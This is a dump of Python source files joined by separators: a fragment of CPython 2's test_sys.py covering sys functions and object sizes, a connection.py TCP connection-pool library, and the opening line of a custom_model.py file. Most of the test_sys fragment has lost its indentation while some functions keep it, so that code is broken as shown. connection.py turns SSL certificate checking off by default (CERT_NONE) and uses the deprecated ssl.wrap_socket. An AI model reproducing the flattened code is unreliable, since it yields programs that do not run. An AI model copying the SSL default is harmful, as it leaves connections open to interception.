    err = cStringIO.StringIO()
    sys.stderr = err                      # capture the traceback output
    eh = sys.__excepthook__
    self.assertRaises(TypeError, eh)      # no arguments is an error
    try:
        raise ValueError(42)
    except ValueError, exc:
        eh(*sys.exc_info())               # report the live exception
    sys.stderr = savestderr
    # the report must end with the exception line itself
    self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
    """sys.getdefaultencoding() takes no arguments and returns a str."""
    if not test.test_support.have_unicode:
        return
    self.assertRaises(TypeError, sys.getdefaultencoding, 42)
    # can't check more than the type, as the user might have changed it
    self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
    """get/setcheckinterval round-trips for several values."""
    self.assertRaises(TypeError, sys.setcheckinterval)
    orig = sys.getcheckinterval()
    # 'orig' is set last so the starting state is restored
    for interval in (0, 100, 120, orig):
        sys.setcheckinterval(interval)
        self.assertEquals(sys.getcheckinterval(), interval)
def test_recursionlimit(self):
    """Argument checking and round-trip of get/setrecursionlimit.

    FIX: the original restored the old limit only after the assertions,
    so a failure left the interpreter with a 10000-deep recursion limit
    for every subsequent test.  Restore it in a finally block.
    """
    self.assertRaises(TypeError, sys.getrecursionlimit, 42)
    oldlimit = sys.getrecursionlimit()
    try:
        self.assertRaises(TypeError, sys.setrecursionlimit)
        self.assertRaises(ValueError, sys.setrecursionlimit, -42)
        sys.setrecursionlimit(10000)
        self.assertEqual(sys.getrecursionlimit(), 10000)
    finally:
        sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
    """get/setdlopenflags round-trip (only where the platform has them)."""
    if not hasattr(sys, "setdlopenflags"):
        return
    self.assert_(hasattr(sys, "getdlopenflags"))
    self.assertRaises(TypeError, sys.getdlopenflags, 42)
    oldflags = sys.getdlopenflags()
    self.assertRaises(TypeError, sys.setdlopenflags)
    sys.setdlopenflags(oldflags + 1)
    self.assertEqual(sys.getdlopenflags(), oldflags + 1)
    sys.setdlopenflags(oldflags)
def test_refcount(self):
    """sys.getrefcount requires an argument and tracks extra references."""
    self.assertRaises(TypeError, sys.getrefcount)
    baseline = sys.getrefcount(None)
    extra = None                                  # one more reference to None
    self.assertEqual(sys.getrefcount(None), baseline + 1)
    del extra                                     # and back down again
    self.assertEqual(sys.getrefcount(None), baseline)
    if hasattr(sys, "gettotalrefcount"):
        # only present in debug (--with-pydebug) builds
        self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi[:], tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
self.assert_(isinstance(vi.major, int))
self.assert_(isinstance(vi.minor, int))
self.assert_(isinstance(vi.micro, int))
self.assert_(vi.releaselevel in
("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi.serial, int))
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assert_(vi > (1,0,0))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(repr(sys.flags))
def test_clear_type_cache(self):
    # Smoke test: sys._clear_type_cache() is callable and must not raise.
    sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, '?')
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '6P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
check(get_cell().func_code, size(h + '4i8Pi2P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3Pi'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh + 'H') - self.H)
check(1L, size(vh + 'H'))
check(-1L, size(vh + 'H'))
check(32768L, size(vh + 'H') + self.H)
check(32768L*32768L-1, size(vh + 'H') + self.H)
check(32768L*32768L, size(vh + 'H') + 2*self.H)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', struct.calcsize(vh + 'li') + 1)
check('abc', struct.calcsize(vh + 'li') + 1 + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
    """Run every test class in this module through the regrtest driver."""
    test.test_support.run_unittest(SysModuleTest, SizeofTest)


if __name__ == "__main__":
    test_main()
|
connection.py | import errno
import os
import random
import socket
import ssl
import sys
from itertools import chain
from queue import Empty, Full, LifoQueue
from basepy.exceptions import ConnectionError
import threading
import time
def threading_spawn(func, *args, **kwargs):
    """Run *func(*args, **kwargs)* on a daemon thread; return the started Thread."""
    worker = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
    worker.start()
    return worker
def threading_wait():
    """Block the calling thread forever, exiting cleanly on Ctrl-C/SystemExit.

    Used as the main-thread parking loop so daemon worker threads keep
    running until the process is interrupted.
    """
    while True:
        try:
            time.sleep(3)
        except (KeyboardInterrupt, SystemExit):
            sys.exit()
spawn_func = threading_spawn
sleep_func = time.sleep
lock_class = threading.Lock
wait_func = threading_wait
class Connection(object):
    """Manages TCP communication to and from a server.

    Handles connect/disconnect, optional SSL wrapping, buffered reads and
    writes.  Instances remember the PID they were created in so pools can
    detect connections inherited across a fork.
    """

    description_format = "Connection<host:%(host)s,port:%(port)s,id:%(id)s>"

    def __init__(self, host, port,
                 socket_connect_timeout=None,
                 socket_timeout=None, **kwargs):
        """Record connection parameters; no socket is opened here.

        SSL is enabled when ``ssl_keyfile`` and/or ``ssl_certfile`` is
        passed; ``ssl_cert_reqs`` may be 'none'/'optional'/'required' or an
        ``ssl.CERT_*`` constant, and ``ssl_ca_certs`` a CA bundle path.
        """
        self.pid = os.getpid()
        self.host = host
        self.port = int(port)
        self.socket_timeout = socket_timeout
        # Fall back to the read/write timeout when no connect timeout given.
        self.socket_connect_timeout = socket_connect_timeout or socket_timeout
        self._sock = None
        self._description_args = {
            'host': self.host,
            'port': self.port,
            'id': id(self)
        }
        self._connect_callbacks = []
        # Receive buffer holding bytes read but not yet consumed by read().
        self.buffer = b""
        self.ssl_conn = False
        if 'ssl_keyfile' in kwargs or 'ssl_certfile' in kwargs:
            self.ssl_conn = True
            # BUGFIX: use .get() -- passing only one of ssl_keyfile /
            # ssl_certfile used to raise KeyError for the missing one.
            self.keyfile = kwargs.get('ssl_keyfile')
            self.certfile = kwargs.get('ssl_certfile')
            ssl_cert_reqs = kwargs.get('ssl_cert_reqs') or ssl.CERT_NONE
            ssl_ca_certs = kwargs.get('ssl_ca_certs')
            if isinstance(ssl_cert_reqs, str):
                cert_reqs = {
                    'none': ssl.CERT_NONE,
                    'optional': ssl.CERT_OPTIONAL,
                    'required': ssl.CERT_REQUIRED
                }
                if ssl_cert_reqs not in cert_reqs:
                    raise Exception("Invalid SSL "
                                    "Certificate Requirements "
                                    "Flag: %s" % ssl_cert_reqs)
                ssl_cert_reqs = cert_reqs[ssl_cert_reqs]
            self.cert_reqs = ssl_cert_reqs
            self.ca_certs = ssl_ca_certs

    def __repr__(self):
        return self.description_format % self._description_args

    def __del__(self):
        # Best-effort cleanup; never let destructor errors propagate.
        try:
            self.disconnect()
        except Exception:
            pass

    def register_connect_callback(self, callback):
        """Register *callback* to be invoked (with self) after each connect."""
        self._connect_callbacks.append(callback)

    def clear_connect_callbacks(self):
        """Drop all registered connect callbacks."""
        self._connect_callbacks = []

    def connect(self):
        """Connects to the server if not already connected"""
        if self._sock:
            return
        try:
            sock = self._connect()
        except socket.error:
            e = sys.exc_info()[1]
            raise ConnectionError(self._error_message(e))
        self._sock = sock
        try:
            self.on_connect()
        except Exception:
            # clean up after any error in on_connect
            self.disconnect()
            raise
        # run any user callbacks. right now the only internal callback
        # is for pubsub channel/pattern resubscription
        for callback in self._connect_callbacks:
            callback(self)

    def _connect(self):
        """Create a TCP socket connection and return the connected socket.

        Mimics socket.create_connection() (tries each getaddrinfo result),
        but sets socket options before connecting, starts from a random
        result for crude load spreading, and optionally wraps in SSL.
        """
        resources = socket.getaddrinfo(self.host, self.port,
                                       socket.AF_INET, socket.SOCK_STREAM)
        if len(resources) == 0:
            raise Exception("getaddrinfo returns an empty list")
        # Randomize which address we try first.
        index = random.randint(1, len(resources))
        start = index % len(resources)
        for i in range(len(resources)):
            family, socktype, proto, canonname, socket_address \
                = resources[(start + i) % len(resources)]
            sock = None
            try:
                sock = socket.socket(family, socktype, proto)
                # TCP_NODELAY: disable Nagle for low-latency small writes.
                sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
                # set the socket_connect_timeout before we connect
                sock.settimeout(self.socket_connect_timeout)
                # connect
                sock.connect(socket_address)
                # set the socket_timeout now that we're connected
                sock.settimeout(self.socket_timeout)
                if self.ssl_conn:
                    sock = ssl.wrap_socket(sock,
                                           cert_reqs=self.cert_reqs,
                                           keyfile=self.keyfile,
                                           certfile=self.certfile,
                                           ca_certs=self.ca_certs)
                return sock
            except socket.error:
                if sock is not None:
                    sock.close()
                # Re-raise only after every address has been tried.
                if i == len(resources) - 1:
                    raise
        # Defensive: unreachable because the empty case raised above.
        raise socket.error("socket.getaddrinfo returned an empty list")

    def _error_message(self, exception):
        """Format a human-readable message for a socket.error.

        args for socket.error can either be (errno, "message") or just
        ("message",).
        """
        if len(exception.args) == 1:
            return "Error connecting to %s:%s. %s." % \
                (self.host, self.port, exception.args[0])
        else:
            return "Error %s connecting to %s:%s. %s." % \
                (exception.args[0], self.host, self.port, exception.args[1])

    def on_connect(self):
        """Hook run after each successful connect; subclasses may override."""
        pass

    def disconnect(self):
        """Disconnects from the server"""
        if self._sock is None:
            return
        try:
            self._sock.shutdown(socket.SHUT_RDWR)
        except socket.error:
            pass
        try:
            # BUGFIX: close() now runs even when shutdown() failed (e.g. on
            # an already-reset peer); previously the descriptor leaked.
            self._sock.close()
        except socket.error:
            pass
        self._sock = None
        self.on_disconnect()

    def on_disconnect(self):
        """Hook run after disconnect; subclasses may override."""
        pass

    def connection(self):
        """Return the underlying socket, connecting lazily if needed."""
        if not self._sock:
            self.connect()
        return self._sock

    def _read(self, n=1024):
        # BUGFIX: default was None, which sock.recv() rejects with a
        # TypeError; use a sensible chunk size instead.
        sock = self.connection()
        return sock.recv(n)

    def read(self, byte_length):
        """Return exactly *byte_length* bytes (fewer only on EOF).

        Reads from the socket into an internal buffer, retrying on EINTR,
        and consumes the requested prefix of the buffer.
        """
        while len(self.buffer) < byte_length:
            try:
                data = self._read(1024)
            except socket.error as ex:
                if ex.args[0] == errno.EINTR:
                    continue
                raise ex
            if not data:
                # EOF: return whatever we have buffered.
                break
            self.buffer += data
        result = self.buffer[:byte_length]
        self.buffer = self.buffer[byte_length:]
        return result

    def write(self, string):
        """Send *string* (str is UTF-8 encoded) over the socket.

        Disconnects and re-raises on any send failure so the connection is
        not reused in an unknown state.
        """
        bstring = b""
        if isinstance(string, str):
            bstring = bytes(string, encoding="utf8")
        elif isinstance(string, bytes):
            bstring = string
        sock = self.connection()
        try:
            return sock.sendall(bstring)
        except Exception:
            self.disconnect()
            raise
class ConnectionPool(object):
    """A simple, fork-aware connection pool.

    Connections are created lazily up to ``max_connections`` and reused
    LIFO-style.  After a fork, the first use in the child detects the PID
    change and resets the pool so parent/child never share sockets.
    """

    def __init__(self,
                 connection_class=Connection,
                 max_connections=None, **kwargs):
        """Store the factory and its kwargs; ``reset()`` builds the state."""
        self.connection_class = connection_class
        self.max_connections = max_connections or 2 ** 31
        self.connection_kwargs = kwargs
        self.pid = None
        self._created_connections = None
        self._available_connections = None
        self._in_use_connections = None
        self._check_lock = None
        self.reset()

    def __repr__(self):
        return "%s<%s>" % (
            type(self).__name__,
            self.connection_class.description_format
            % self.connection_kwargs,
        )

    def reset(self):
        """Re-initialize bookkeeping (also called after a fork is detected)."""
        self.pid = os.getpid()
        self._created_connections = 0
        self._available_connections = []
        self._in_use_connections = set()
        self._check_lock = lock_class()

    def _checkpid(self):
        """Reset the pool if we are running in a forked child process."""
        if self.pid != os.getpid():
            with self._check_lock:
                if self.pid == os.getpid():
                    # another thread already did the work while we waited
                    # on the lock.
                    return
                self.disconnect()
                self.reset()

    def get_connection(self):
        """Get a connection from the pool"""
        self._checkpid()
        try:
            connection = self._available_connections.pop()
        except IndexError:
            # Pool empty: create a fresh connection (EAFP).
            connection = self.make_connection()
        self._in_use_connections.add(connection)
        return connection

    def make_connection(self):
        """Create a new connection"""
        if self._created_connections >= self.max_connections:
            raise ConnectionError("Too many connections")
        self._created_connections += 1
        return self.connection_class(**self.connection_kwargs)

    def release(self, connection):
        """Releases the connection back to the pool"""
        self._checkpid()
        if connection.pid != self.pid:
            # Connection belongs to another process (pre-fork); drop it.
            return
        # BUGFIX: discard() instead of remove() -- a connection handed out
        # before reset() is not in the rebuilt in-use set, and remove()
        # raised KeyError here.
        self._in_use_connections.discard(connection)
        self._available_connections.append(connection)

    def disconnect(self):
        """Disconnects all connections in the pool"""
        all_conns = chain(self._available_connections,
                          self._in_use_connections)
        for connection in all_conns:
            connection.disconnect()
class BlockingConnectionPool(ConnectionPool):
    """
    Thread-safe blocking connection pool.
    It performs the same function as the default
    ``:py:class: ~basepy.network.connection.ConnectionPool``
    implementation, in that, it maintains a pool of reusable
    connections (safely across threads if required).
    The difference is that, in the event that a client tries to get a
    connection from the pool when all of connections are in use, rather than
    raising a ``:py:class: ~basepy.exceptions.ConnectionError``
    (as the default ``:py:class: ~basepy.network.connection.ConnectionPool``
    implementation does), it makes the client wait ("blocks") for a
    specified number of seconds until a connection becomes available.
    Use ``max_connections`` to increase / decrease the pool size::
    >>> pool = BlockingConnectionPool(max_connections=10)
    Use ``timeout`` to tell it either how many seconds to wait for a connection
    to become available, or to block forever:
    # Block forever.
    >>> pool = BlockingConnectionPool(timeout=None)
    # Raise a ``ConnectionError`` after five seconds if a connection is
    # not available.
    >>> pool = BlockingConnectionPool(timeout=5)
    """

    def __init__(self, max_connections=100, timeout=6,
                 connection_class=Connection, queue_class=LifoQueue,
                 **connection_kwargs):
        # ``queue_class`` must be thread-safe; LIFO favors handing out the
        # most recently used (hence most likely still-open) connection.
        self.queue_class = queue_class
        self.timeout = timeout
        self.pool = None
        self._connections = None
        # The superclass __init__ calls self.reset(), which builds the queue.
        super(BlockingConnectionPool, self).__init__(
            connection_class=connection_class,
            max_connections=max_connections,
            **connection_kwargs)

    def reset(self):
        """Rebuild the pool state (also called after a fork is detected)."""
        self.pid = os.getpid()
        self._check_lock = lock_class()
        # Create and fill up a thread safe queue with ``None`` values.
        self.pool = self.queue_class(self.max_connections)
        while True:
            try:
                self.pool.put_nowait(None)
            except Full:
                break
        # Keep a list of actual connection instances so that we can
        # disconnect them later.
        self._connections = []

    def make_connection(self):
        """Make a fresh connection."""
        connection = self.connection_class(**self.connection_kwargs)
        self._connections.append(connection)
        return connection

    def get_connection(self):
        """
        Get a connection, blocking for ``self.timeout`` until a connection
        is available from the pool.
        If the connection returned is ``None`` then creates a new connection.
        Because we use a last-in first-out queue, the existing connections
        (having been returned to the pool after the initial ``None`` values
        were added) will be returned before ``None`` values. This means we only
        create new connections when we need to, i.e.: the actual number of
        connections will only increase in response to demand.
        """
        # Make sure we haven't changed process.
        self._checkpid()
        # Try and get a connection from the pool. If one isn't available within
        # self.timeout then raise a ``ConnectionError``.
        try:
            connection = self.pool.get(block=True, timeout=self.timeout)
        except Empty:
            raise ConnectionError("No connection available.")
        # If the ``connection`` is actually ``None`` then that's a cue to make
        # a new connection to add to the pool.
        if connection is None:
            connection = self.make_connection()
        return connection

    def release(self, connection):
        """Releases the connection back to the pool."""
        # Make sure we haven't changed process.
        self._checkpid()
        if connection.pid != self.pid:
            return
        # Put the connection back into the pool.
        try:
            self.pool.put_nowait(connection)
        except Full:
            # perhaps the pool has been reset() after a fork? regardless,
            # we don't want this connection
            pass

    def disconnect(self):
        """Disconnects all connections in the pool."""
        for connection in self._connections:
            connection.disconnect()
|
custom_model.py | import json
